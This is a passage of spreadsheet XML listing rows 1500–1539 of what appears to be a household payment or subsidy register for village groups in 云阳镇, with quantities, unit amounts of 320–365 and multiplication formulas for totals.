      <c r="I1500" s="17">
        <f>H1500*G1500</f>
        <v>365</v>
      </c>
      <c r="J1500" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1500" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1501" customHeight="1" spans="1:11">
      <c r="A1501" s="16" t="s">
        <v>4031</v>
      </c>
      <c r="B1501" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1501" s="17" t="s">
        <v>3831</v>
      </c>
      <c r="D1501" s="17" t="s">
        <v>4032</v>
      </c>
      <c r="E1501" s="17" t="s">
        <v>4033</v>
      </c>
      <c r="F1501" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1501" s="17">
        <v>1</v>
      </c>
      <c r="H1501" s="18">
        <v>365</v>
      </c>
      <c r="I1501" s="17">
        <f>H1501*G1501</f>
        <v>365</v>
      </c>
      <c r="J1501" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1501" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1502" customHeight="1" spans="1:11">
      <c r="A1502" s="16" t="s">
        <v>4034</v>
      </c>
      <c r="B1502" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1502" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="D1502" s="17" t="s">
        <v>4035</v>
      </c>
      <c r="E1502" s="17" t="s">
        <v>3693</v>
      </c>
      <c r="F1502" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1502" s="17">
        <v>1</v>
      </c>
      <c r="H1502" s="18">
        <v>365</v>
      </c>
      <c r="I1502" s="17">
        <f>H1502*G1502</f>
        <v>365</v>
      </c>
      <c r="J1502" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1502" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1503" customHeight="1" spans="1:11">
      <c r="A1503" s="16" t="s">
        <v>4036</v>
      </c>
      <c r="B1503" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1503" s="17" t="s">
        <v>3831</v>
      </c>
      <c r="D1503" s="17" t="s">
        <v>4037</v>
      </c>
      <c r="E1503" s="17" t="s">
        <v>3604</v>
      </c>
      <c r="F1503" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1503" s="17">
        <v>1</v>
      </c>
      <c r="H1503" s="18">
        <v>365</v>
      </c>
      <c r="I1503" s="17">
        <f>H1503*G1503</f>
        <v>365</v>
      </c>
      <c r="J1503" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1503" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1504" customHeight="1" spans="1:11">
      <c r="A1504" s="16" t="s">
        <v>4038</v>
      </c>
      <c r="B1504" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1504" s="17" t="s">
        <v>3561</v>
      </c>
      <c r="D1504" s="17" t="s">
        <v>4039</v>
      </c>
      <c r="E1504" s="17" t="s">
        <v>4040</v>
      </c>
      <c r="F1504" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1504" s="17">
        <v>2</v>
      </c>
      <c r="H1504" s="18">
        <v>325</v>
      </c>
      <c r="I1504" s="17">
        <f>H1504*G1504</f>
        <v>650</v>
      </c>
      <c r="J1504" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1504" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1505" customHeight="1" spans="1:11">
      <c r="A1505" s="16" t="s">
        <v>4041</v>
      </c>
      <c r="B1505" s="17" t="str">
        <f>B1504</f>
        <v>云阳镇</v>
      </c>
      <c r="C1505" s="17" t="str">
        <f>C1504</f>
        <v>小关九组</v>
      </c>
      <c r="D1505" s="24" t="s">
        <v>4042</v>
      </c>
      <c r="E1505" s="24" t="s">
        <v>4043</v>
      </c>
      <c r="F1505" s="17" t="str">
        <f>F1504</f>
        <v>4113210521</v>
      </c>
      <c r="G1505" s="17"/>
      <c r="H1505" s="17"/>
      <c r="I1505" s="17"/>
      <c r="J1505" s="17"/>
      <c r="K1505" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1506" customHeight="1" spans="1:11">
      <c r="A1506" s="16" t="s">
        <v>4044</v>
      </c>
      <c r="B1506" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1506" s="17" t="s">
        <v>3818</v>
      </c>
      <c r="D1506" s="17" t="s">
        <v>4045</v>
      </c>
      <c r="E1506" s="17" t="s">
        <v>4046</v>
      </c>
      <c r="F1506" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1506" s="17">
        <v>1</v>
      </c>
      <c r="H1506" s="18">
        <v>365</v>
      </c>
      <c r="I1506" s="17">
        <f t="shared" ref="I1506:I1512" si="79">H1506*G1506</f>
        <v>365</v>
      </c>
      <c r="J1506" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1506" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1507" customHeight="1" spans="1:11">
      <c r="A1507" s="16" t="s">
        <v>4047</v>
      </c>
      <c r="B1507" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1507" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1507" s="17" t="s">
        <v>4048</v>
      </c>
      <c r="E1507" s="17" t="s">
        <v>4049</v>
      </c>
      <c r="F1507" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1507" s="17">
        <v>1</v>
      </c>
      <c r="H1507" s="18">
        <v>365</v>
      </c>
      <c r="I1507" s="17">
        <f t="shared" si="79"/>
        <v>365</v>
      </c>
      <c r="J1507" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1507" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1508" customHeight="1" spans="1:11">
      <c r="A1508" s="16" t="s">
        <v>4050</v>
      </c>
      <c r="B1508" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1508" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1508" s="17" t="s">
        <v>4051</v>
      </c>
      <c r="E1508" s="17" t="s">
        <v>3852</v>
      </c>
      <c r="F1508" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1508" s="17">
        <v>1</v>
      </c>
      <c r="H1508" s="18">
        <v>365</v>
      </c>
      <c r="I1508" s="17">
        <f t="shared" si="79"/>
        <v>365</v>
      </c>
      <c r="J1508" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1508" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1509" customHeight="1" spans="1:11">
      <c r="A1509" s="16" t="s">
        <v>4052</v>
      </c>
      <c r="B1509" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1509" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1509" s="17" t="s">
        <v>4053</v>
      </c>
      <c r="E1509" s="17" t="s">
        <v>4054</v>
      </c>
      <c r="F1509" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1509" s="17">
        <v>1</v>
      </c>
      <c r="H1509" s="18">
        <v>365</v>
      </c>
      <c r="I1509" s="17">
        <f t="shared" si="79"/>
        <v>365</v>
      </c>
      <c r="J1509" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1509" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1510" customHeight="1" spans="1:11">
      <c r="A1510" s="16" t="s">
        <v>4055</v>
      </c>
      <c r="B1510" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1510" s="17" t="s">
        <v>3612</v>
      </c>
      <c r="D1510" s="17" t="s">
        <v>4056</v>
      </c>
      <c r="E1510" s="17" t="s">
        <v>3979</v>
      </c>
      <c r="F1510" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1510" s="17">
        <v>1</v>
      </c>
      <c r="H1510" s="18">
        <v>365</v>
      </c>
      <c r="I1510" s="17">
        <f t="shared" si="79"/>
        <v>365</v>
      </c>
      <c r="J1510" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1510" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1511" customHeight="1" spans="1:11">
      <c r="A1511" s="16" t="s">
        <v>4057</v>
      </c>
      <c r="B1511" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1511" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1511" s="17" t="s">
        <v>4058</v>
      </c>
      <c r="E1511" s="17" t="s">
        <v>3945</v>
      </c>
      <c r="F1511" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1511" s="17">
        <v>1</v>
      </c>
      <c r="H1511" s="18">
        <v>365</v>
      </c>
      <c r="I1511" s="17">
        <f t="shared" si="79"/>
        <v>365</v>
      </c>
      <c r="J1511" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1511" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1512" customHeight="1" spans="1:11">
      <c r="A1512" s="16" t="s">
        <v>4059</v>
      </c>
      <c r="B1512" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1512" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1512" s="17" t="s">
        <v>4060</v>
      </c>
      <c r="E1512" s="17" t="s">
        <v>3715</v>
      </c>
      <c r="F1512" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1512" s="17">
        <v>2</v>
      </c>
      <c r="H1512" s="18">
        <v>325</v>
      </c>
      <c r="I1512" s="17">
        <f t="shared" si="79"/>
        <v>650</v>
      </c>
      <c r="J1512" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1512" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1513" customHeight="1" spans="1:11">
      <c r="A1513" s="16" t="s">
        <v>4061</v>
      </c>
      <c r="B1513" s="17" t="str">
        <f>B1512</f>
        <v>云阳镇</v>
      </c>
      <c r="C1513" s="17" t="str">
        <f>C1512</f>
        <v>老城四组</v>
      </c>
      <c r="D1513" s="16" t="s">
        <v>4062</v>
      </c>
      <c r="E1513" s="16" t="s">
        <v>3727</v>
      </c>
      <c r="F1513" s="17" t="str">
        <f>F1512</f>
        <v>4113210523</v>
      </c>
      <c r="G1513" s="17"/>
      <c r="H1513" s="17"/>
      <c r="I1513" s="17"/>
      <c r="J1513" s="17"/>
      <c r="K1513" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1514" customHeight="1" spans="1:11">
      <c r="A1514" s="16" t="s">
        <v>4063</v>
      </c>
      <c r="B1514" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1514" s="17" t="s">
        <v>3741</v>
      </c>
      <c r="D1514" s="17" t="s">
        <v>4064</v>
      </c>
      <c r="E1514" s="17" t="s">
        <v>4054</v>
      </c>
      <c r="F1514" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1514" s="17">
        <v>2</v>
      </c>
      <c r="H1514" s="18">
        <v>325</v>
      </c>
      <c r="I1514" s="17">
        <f>H1514*G1514</f>
        <v>650</v>
      </c>
      <c r="J1514" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1514" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1515" customHeight="1" spans="1:11">
      <c r="A1515" s="16" t="s">
        <v>4065</v>
      </c>
      <c r="B1515" s="17" t="str">
        <f>B1514</f>
        <v>云阳镇</v>
      </c>
      <c r="C1515" s="17" t="str">
        <f>C1514</f>
        <v>老城二组</v>
      </c>
      <c r="D1515" s="16" t="s">
        <v>4066</v>
      </c>
      <c r="E1515" s="16" t="s">
        <v>4067</v>
      </c>
      <c r="F1515" s="17" t="str">
        <f>F1514</f>
        <v>4113210523</v>
      </c>
      <c r="G1515" s="17"/>
      <c r="H1515" s="17"/>
      <c r="I1515" s="17"/>
      <c r="J1515" s="17"/>
      <c r="K1515" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1516" customHeight="1" spans="1:11">
      <c r="A1516" s="16" t="s">
        <v>4068</v>
      </c>
      <c r="B1516" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1516" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1516" s="17" t="s">
        <v>4069</v>
      </c>
      <c r="E1516" s="17" t="s">
        <v>4070</v>
      </c>
      <c r="F1516" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1516" s="17">
        <v>1</v>
      </c>
      <c r="H1516" s="18">
        <v>365</v>
      </c>
      <c r="I1516" s="17">
        <f>H1516*G1516</f>
        <v>365</v>
      </c>
      <c r="J1516" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1516" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1517" customHeight="1" spans="1:11">
      <c r="A1517" s="16" t="s">
        <v>4071</v>
      </c>
      <c r="B1517" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1517" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1517" s="17" t="s">
        <v>4072</v>
      </c>
      <c r="E1517" s="17" t="s">
        <v>3583</v>
      </c>
      <c r="F1517" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1517" s="17">
        <v>1</v>
      </c>
      <c r="H1517" s="18">
        <v>365</v>
      </c>
      <c r="I1517" s="17">
        <f>H1517*G1517</f>
        <v>365</v>
      </c>
      <c r="J1517" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1517" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1518" customHeight="1" spans="1:11">
      <c r="A1518" s="16" t="s">
        <v>4073</v>
      </c>
      <c r="B1518" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1518" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1518" s="17" t="s">
        <v>4074</v>
      </c>
      <c r="E1518" s="17" t="s">
        <v>3640</v>
      </c>
      <c r="F1518" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1518" s="17">
        <v>1</v>
      </c>
      <c r="H1518" s="18">
        <v>365</v>
      </c>
      <c r="I1518" s="17">
        <f>H1518*G1518</f>
        <v>365</v>
      </c>
      <c r="J1518" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1518" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1519" customHeight="1" spans="1:11">
      <c r="A1519" s="16" t="s">
        <v>4075</v>
      </c>
      <c r="B1519" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1519" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1519" s="17" t="s">
        <v>4076</v>
      </c>
      <c r="E1519" s="17" t="s">
        <v>3715</v>
      </c>
      <c r="F1519" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1519" s="17">
        <v>1</v>
      </c>
      <c r="H1519" s="18">
        <v>365</v>
      </c>
      <c r="I1519" s="17">
        <f>H1519*G1519</f>
        <v>365</v>
      </c>
      <c r="J1519" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1519" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1520" customHeight="1" spans="1:11">
      <c r="A1520" s="16" t="s">
        <v>4077</v>
      </c>
      <c r="B1520" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1520" s="17" t="s">
        <v>3561</v>
      </c>
      <c r="D1520" s="17" t="s">
        <v>4078</v>
      </c>
      <c r="E1520" s="17" t="s">
        <v>4079</v>
      </c>
      <c r="F1520" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1520" s="17">
        <v>2</v>
      </c>
      <c r="H1520" s="18">
        <v>325</v>
      </c>
      <c r="I1520" s="17">
        <f>H1520*G1520</f>
        <v>650</v>
      </c>
      <c r="J1520" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1520" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1521" customHeight="1" spans="1:11">
      <c r="A1521" s="16" t="s">
        <v>4080</v>
      </c>
      <c r="B1521" s="17" t="str">
        <f>B1520</f>
        <v>云阳镇</v>
      </c>
      <c r="C1521" s="17" t="str">
        <f>C1520</f>
        <v>小关九组</v>
      </c>
      <c r="D1521" s="16" t="s">
        <v>4081</v>
      </c>
      <c r="E1521" s="16" t="s">
        <v>4082</v>
      </c>
      <c r="F1521" s="17" t="str">
        <f>F1520</f>
        <v>4113210521</v>
      </c>
      <c r="G1521" s="17"/>
      <c r="H1521" s="17"/>
      <c r="I1521" s="17"/>
      <c r="J1521" s="17"/>
      <c r="K1521" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1522" customHeight="1" spans="1:11">
      <c r="A1522" s="16" t="s">
        <v>4083</v>
      </c>
      <c r="B1522" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1522" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1522" s="17" t="s">
        <v>4084</v>
      </c>
      <c r="E1522" s="17" t="s">
        <v>4002</v>
      </c>
      <c r="F1522" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1522" s="17">
        <v>1</v>
      </c>
      <c r="H1522" s="18">
        <v>365</v>
      </c>
      <c r="I1522" s="17">
        <f t="shared" ref="I1522:I1527" si="80">H1522*G1522</f>
        <v>365</v>
      </c>
      <c r="J1522" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1522" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1523" customHeight="1" spans="1:11">
      <c r="A1523" s="16" t="s">
        <v>4085</v>
      </c>
      <c r="B1523" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1523" s="17" t="s">
        <v>3741</v>
      </c>
      <c r="D1523" s="17" t="s">
        <v>4086</v>
      </c>
      <c r="E1523" s="17" t="s">
        <v>3772</v>
      </c>
      <c r="F1523" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1523" s="17">
        <v>1</v>
      </c>
      <c r="H1523" s="18">
        <v>365</v>
      </c>
      <c r="I1523" s="17">
        <f t="shared" si="80"/>
        <v>365</v>
      </c>
      <c r="J1523" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1523" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1524" customHeight="1" spans="1:11">
      <c r="A1524" s="16" t="s">
        <v>4087</v>
      </c>
      <c r="B1524" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1524" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1524" s="17" t="s">
        <v>4088</v>
      </c>
      <c r="E1524" s="17" t="s">
        <v>3574</v>
      </c>
      <c r="F1524" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1524" s="17">
        <v>1</v>
      </c>
      <c r="H1524" s="18">
        <v>365</v>
      </c>
      <c r="I1524" s="17">
        <f t="shared" si="80"/>
        <v>365</v>
      </c>
      <c r="J1524" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1524" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1525" customHeight="1" spans="1:11">
      <c r="A1525" s="16" t="s">
        <v>4089</v>
      </c>
      <c r="B1525" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1525" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1525" s="17" t="s">
        <v>4090</v>
      </c>
      <c r="E1525" s="17" t="s">
        <v>4091</v>
      </c>
      <c r="F1525" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1525" s="17">
        <v>1</v>
      </c>
      <c r="H1525" s="18">
        <v>365</v>
      </c>
      <c r="I1525" s="17">
        <f t="shared" si="80"/>
        <v>365</v>
      </c>
      <c r="J1525" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1525" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1526" customHeight="1" spans="1:11">
      <c r="A1526" s="16" t="s">
        <v>4092</v>
      </c>
      <c r="B1526" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1526" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1526" s="17" t="s">
        <v>4093</v>
      </c>
      <c r="E1526" s="17" t="s">
        <v>3796</v>
      </c>
      <c r="F1526" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1526" s="17">
        <v>1</v>
      </c>
      <c r="H1526" s="18">
        <v>365</v>
      </c>
      <c r="I1526" s="17">
        <f t="shared" si="80"/>
        <v>365</v>
      </c>
      <c r="J1526" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1526" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1527" customHeight="1" spans="1:11">
      <c r="A1527" s="16" t="s">
        <v>4094</v>
      </c>
      <c r="B1527" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1527" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1527" s="17" t="s">
        <v>4095</v>
      </c>
      <c r="E1527" s="17" t="s">
        <v>4096</v>
      </c>
      <c r="F1527" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1527" s="17">
        <v>2</v>
      </c>
      <c r="H1527" s="18">
        <v>325</v>
      </c>
      <c r="I1527" s="17">
        <f t="shared" si="80"/>
        <v>650</v>
      </c>
      <c r="J1527" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1527" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1528" customHeight="1" spans="1:11">
      <c r="A1528" s="16" t="s">
        <v>4097</v>
      </c>
      <c r="B1528" s="17" t="str">
        <f>B1527</f>
        <v>云阳镇</v>
      </c>
      <c r="C1528" s="17" t="str">
        <f>C1527</f>
        <v>老城一组</v>
      </c>
      <c r="D1528" s="16" t="s">
        <v>4098</v>
      </c>
      <c r="E1528" s="16" t="s">
        <v>4099</v>
      </c>
      <c r="F1528" s="17" t="str">
        <f>F1527</f>
        <v>4113210523</v>
      </c>
      <c r="G1528" s="17"/>
      <c r="H1528" s="17"/>
      <c r="I1528" s="17"/>
      <c r="J1528" s="17"/>
      <c r="K1528" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1529" customHeight="1" spans="1:11">
      <c r="A1529" s="16" t="s">
        <v>4100</v>
      </c>
      <c r="B1529" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1529" s="17" t="s">
        <v>4101</v>
      </c>
      <c r="D1529" s="17" t="s">
        <v>4102</v>
      </c>
      <c r="E1529" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1529" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1529" s="17">
        <v>3</v>
      </c>
      <c r="H1529" s="18">
        <v>320</v>
      </c>
      <c r="I1529" s="17">
        <f>H1529*G1529</f>
        <v>960</v>
      </c>
      <c r="J1529" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1529" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1530" customHeight="1" spans="1:11">
      <c r="A1530" s="16" t="s">
        <v>4103</v>
      </c>
      <c r="B1530" s="17" t="str">
        <f>B1529</f>
        <v>云阳镇</v>
      </c>
      <c r="C1530" s="17" t="str">
        <f>C1529</f>
        <v>云阳老城一组</v>
      </c>
      <c r="D1530" s="16" t="s">
        <v>4104</v>
      </c>
      <c r="E1530" s="16" t="s">
        <v>3510</v>
      </c>
      <c r="F1530" s="17" t="str">
        <f>F1529</f>
        <v>4113210523</v>
      </c>
      <c r="G1530" s="17"/>
      <c r="H1530" s="17"/>
      <c r="I1530" s="17"/>
      <c r="J1530" s="17"/>
      <c r="K1530" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1531" customHeight="1" spans="1:11">
      <c r="A1531" s="16" t="s">
        <v>4105</v>
      </c>
      <c r="B1531" s="17" t="str">
        <f>B1530</f>
        <v>云阳镇</v>
      </c>
      <c r="C1531" s="17" t="str">
        <f>C1530</f>
        <v>云阳老城一组</v>
      </c>
      <c r="D1531" s="16" t="s">
        <v>4106</v>
      </c>
      <c r="E1531" s="23" t="s">
        <v>4107</v>
      </c>
      <c r="F1531" s="17" t="str">
        <f>F1530</f>
        <v>4113210523</v>
      </c>
      <c r="G1531" s="17"/>
      <c r="H1531" s="17"/>
      <c r="I1531" s="17"/>
      <c r="J1531" s="17"/>
      <c r="K1531" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1532" customHeight="1" spans="1:11">
      <c r="A1532" s="16" t="s">
        <v>4108</v>
      </c>
      <c r="B1532" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1532" s="17" t="s">
        <v>4109</v>
      </c>
      <c r="D1532" s="17" t="s">
        <v>4110</v>
      </c>
      <c r="E1532" s="17" t="s">
        <v>3945</v>
      </c>
      <c r="F1532" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1532" s="17">
        <v>1</v>
      </c>
      <c r="H1532" s="18">
        <v>365</v>
      </c>
      <c r="I1532" s="17">
        <f t="shared" ref="I1532:I1546" si="81">H1532*G1532</f>
        <v>365</v>
      </c>
      <c r="J1532" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1532" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1533" customHeight="1" spans="1:11">
      <c r="A1533" s="16" t="s">
        <v>4111</v>
      </c>
      <c r="B1533" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1533" s="17" t="s">
        <v>4112</v>
      </c>
      <c r="D1533" s="17" t="s">
        <v>4113</v>
      </c>
      <c r="E1533" s="17" t="s">
        <v>4114</v>
      </c>
      <c r="F1533" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1533" s="17">
        <v>1</v>
      </c>
      <c r="H1533" s="18">
        <v>365</v>
      </c>
      <c r="I1533" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1533" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1533" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1534" customHeight="1" spans="1:11">
      <c r="A1534" s="16" t="s">
        <v>4115</v>
      </c>
      <c r="B1534" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1534" s="17" t="s">
        <v>3997</v>
      </c>
      <c r="D1534" s="17" t="s">
        <v>4116</v>
      </c>
      <c r="E1534" s="17" t="s">
        <v>4114</v>
      </c>
      <c r="F1534" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1534" s="17">
        <v>1</v>
      </c>
      <c r="H1534" s="18">
        <v>365</v>
      </c>
      <c r="I1534" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1534" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1534" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1535" customHeight="1" spans="1:11">
      <c r="A1535" s="16" t="s">
        <v>4117</v>
      </c>
      <c r="B1535" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1535" s="17" t="s">
        <v>3997</v>
      </c>
      <c r="D1535" s="17" t="s">
        <v>4118</v>
      </c>
      <c r="E1535" s="17" t="s">
        <v>4002</v>
      </c>
      <c r="F1535" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1535" s="17">
        <v>1</v>
      </c>
      <c r="H1535" s="18">
        <v>365</v>
      </c>
      <c r="I1535" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1535" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1535" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1536" customHeight="1" spans="1:11">
      <c r="A1536" s="16" t="s">
        <v>4119</v>
      </c>
      <c r="B1536" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1536" s="17" t="s">
        <v>3997</v>
      </c>
      <c r="D1536" s="17" t="s">
        <v>4120</v>
      </c>
      <c r="E1536" s="17" t="s">
        <v>4121</v>
      </c>
      <c r="F1536" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1536" s="17">
        <v>1</v>
      </c>
      <c r="H1536" s="18">
        <v>365</v>
      </c>
      <c r="I1536" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1536" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1536" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1537" customHeight="1" spans="1:11">
      <c r="A1537" s="16" t="s">
        <v>4122</v>
      </c>
      <c r="B1537" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1537" s="17" t="s">
        <v>4009</v>
      </c>
      <c r="D1537" s="17" t="s">
        <v>4123</v>
      </c>
      <c r="E1537" s="17" t="s">
        <v>4124</v>
      </c>
      <c r="F1537" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1537" s="17">
        <v>1</v>
      </c>
      <c r="H1537" s="18">
        <v>365</v>
      </c>
      <c r="I1537" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1537" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1537" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1538" customHeight="1" spans="1:11">
      <c r="A1538" s="16" t="s">
        <v>4125</v>
      </c>
      <c r="B1538" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1538" s="17" t="s">
        <v>4009</v>
      </c>
      <c r="D1538" s="17" t="s">
        <v>4126</v>
      </c>
      <c r="E1538" s="17" t="s">
        <v>3747</v>
      </c>
      <c r="F1538" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1538" s="17">
        <v>1</v>
      </c>
      <c r="H1538" s="18">
        <v>365</v>
      </c>
      <c r="I1538" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1538" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1538" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1539" customHeight="1" spans="1:11">
      <c r="A1539" s="16" t="s">
        <v>4127</v>
      </c>
      <c r="B1539" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1539" s="17" t="s">
        <v>4009</v>
      </c>
      <c r="D1539" s="17" t="s">
        <v>4128</v>
      </c>
      <c r="E1539" s="17" t="s">
        <v>1091</v>
      </c>
      <c r="F1539" s="17" t="s">
        <v>3598</v>
      </c>
